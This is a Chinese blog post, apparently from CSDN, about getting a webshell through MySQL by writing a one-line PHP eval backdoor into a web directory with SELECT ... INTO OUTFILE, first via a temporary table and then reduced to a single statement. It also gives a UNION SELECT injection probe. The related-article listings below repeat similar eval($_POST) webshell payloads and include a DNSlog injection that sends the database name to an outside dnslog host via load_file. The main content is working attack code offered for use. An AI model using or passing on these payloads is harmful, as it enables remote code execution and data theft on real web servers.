浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL

最新推荐文章于 2024-04-06 01:14:12 发布
最新推荐文章于 2024-04-06 01:14:12 发布
阅读量9.9k 收藏 4
点赞数
分类专栏: SQL注入 文章标签: sql注入

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。
  文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):
  Drop TABLE IF EXISTS temp; //如果存在temp就删掉
  Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
  Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表
  Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
  Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
  这几句SQL很简单,我做了简单的注释。
  不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句:
  /**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
  然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
  如果我们把上面这句改成/**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
  也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。
  既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。
  有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:
  
Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

  这样做不但简单明了,而且避免了误删别人的数据。

原文章链接:红黑联盟

Gs_Yu
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php mysql 注入一句话木马_渗透技术--SQL注入一句话木马原理
weixin_39800387的博客
02-19 2276
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
SQL注入Access导出WebShell
热门推荐
lake2的专栏
11-23 1万+
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等格式)的方法: 
文件上传漏洞
最新发布
zhoutong2323的博客
04-06 788
Webshell是指一种利用Web漏洞获取远程操作权限的工具或脚本,Webshell通常隐藏在Web应用程序的后台目录中,攻击者通过利用一些已知的或未知的漏洞,将Webshell上传到服务器中。一旦成功部署Webshell,攻击者可以通过浏览器或专门的管理工具对服务器进行远程操控,并执行任意操作。
数据库导出WebShell
CH3UHX9
05-11 171
简介 在控制了用户之后,利用用户的权限(如果比较大),就能够执行sql语句,并且导出WebShell。 步骤 建立表hack,设置字段名为cmd(text类型并不允许为空); 向cmd字段插入字符串,此时字符串为一句话木马导出cmd字段的内容到硬盘; 删除表hack。 常用语句 Access CREATE TABLE CMD (A VARCHAR(50)) INSERT INTO CMD (A) VALUES('<?php @eval($_POST[cheuhxg]);?>') SE
mysql写入一句话木马
Websec
07-16 1万+
前提: root权限,知道了服务器的web的绝对路径,尝试写入一句mysql查询语句执行:select "&lt;?php @eval($_POST['pass']);?&gt;" INTO OUTFILE "D:\Wamp\2.php" 注意事项: 1、绝对路径的猜解 2、INTO OUTFILE 后面的"D:\Wamp\2.php",有的时候需要变成“D:\\Wamp\\2.ph...
MySQL-SQL注入,导入,导出
MinggeQingchun的博客
01-22 562
一、MySQLSQL 注入 SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令 以下实例中,输入的用户名必须为字母、数字及下划线的组合,且用户名长度为 8 到 20 个字符之间 if (preg_match("/^\w{8,20}$/", $_GET['username'], $matches)){ $result = mysqli_query($conn, "SELECT * FROM users
MySQL导出一句话拿WebShell方法
06-19
MySQL导出一句话拿WebShell方法
一句话的艺术-web提权.pdf
01-25
一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
webshell一句
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
JSP一句话后门
10-31
JSP一句话后门 JSP一句话后门是指在Java Server Pages(JSP)中使用的一种后门技术,该技术允许攻击者在服务器上写入恶意文件,从而控制服务器的行为。 知识点1: JSP是什么? JSP全名为Java Server Pages,是一种...
ACCESS导一句话拿webshell1
08-08
在本文中,我们将探讨一种利用ACCESS数据库导出功能来植入Webshell方法,这种方法被称为"ACCESS导一句话拿webshell1"。Webshell是一种后门程序,常用于远程控制被黑网站,执行恶意操作。此技术主要针对使用ACCESS...
通过mysql写入一句话木马
aocong5568的博客
10-11 1949
USE mysql;# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 CREATE TABLE a( cmd1 text NOT NULL );# MySQL 返回的查询结果为空(即零行)。 # MySQL 返回的查询结果为空(即零行)。 INSERT INTO a( cmd1 ) VALUES ( '<?php e...
MySQL注入之木马上传拿webshell
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
Mysql写入webshell两种方法总结-- into outfile,导入日志
qq_45730325的博客
05-19 3572
Mysql写入webshell
mysql 一句话木马_通过mysql写入一句话木马
weixin_32522079的博客
01-18 1233
USEmysql;# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。CREATE TABLEa(cmd1text NOT NULL);# MySQL 返回的查询结果为空(即零行)。# MySQL 返回的查询结果为空(即零行)。INSERT INTOa( cmd1 )VALUES('');# 影响列数:1# 影响列数:1SELECTcmd1FROMaINTO...
[MSSQL]SQL语句备份和还原数据库
德仔
03-29 1388
对公司的机器真是无语了,为了节省空间,开始疯狂清理磁盘,一个不小心把企业管理器给卸了,用惯了企业管理器对数据库进行备份和还原,还真有点傻了,虽然我不常这样操作,1,使用SQL最简单备份,还原数据库/*备份*/backupdatabaseTesttodisk='D:/Test.bak'/*还原*/restoredatabaseTestfromdisk='D:/Test.bak
mysql语句输出
坑底Z蛙
05-24 9130
1.select 列1,列2, ....... 列n  from  tbname  [where  条件]  into outfile "C:/Users/****/Desktop/output.txt"2.load data local infile "C:/Users/****/Desktop/output.txt" into table tbname
SQL注入篇——一句话木马
爱国小白帽
01-08 6315
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
MySQLwebshell的限制
公众号shadow sock7
06-18 944
作用:用于限制文件的import/export操作。 参考: https://dev.mysql.com/doc/refman/5.7/en/server-system-variables.html#sysvar_secure_file_priv https://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_file 关于MySQL注入读写文件的限制 mysql 5.7.16引入。 默认值与平台相关。 Windows上, N
通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源
06-11
可以通过SELinux设置防止webshell.php一句话木马访问Linux服务器上nginx代理网站外的其他资源,以下是具体步骤: 1. 确认SELinux状态:使用命令`getenforce`检查SELinux是否开启,如果输出`Enforcing`,则SELinux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值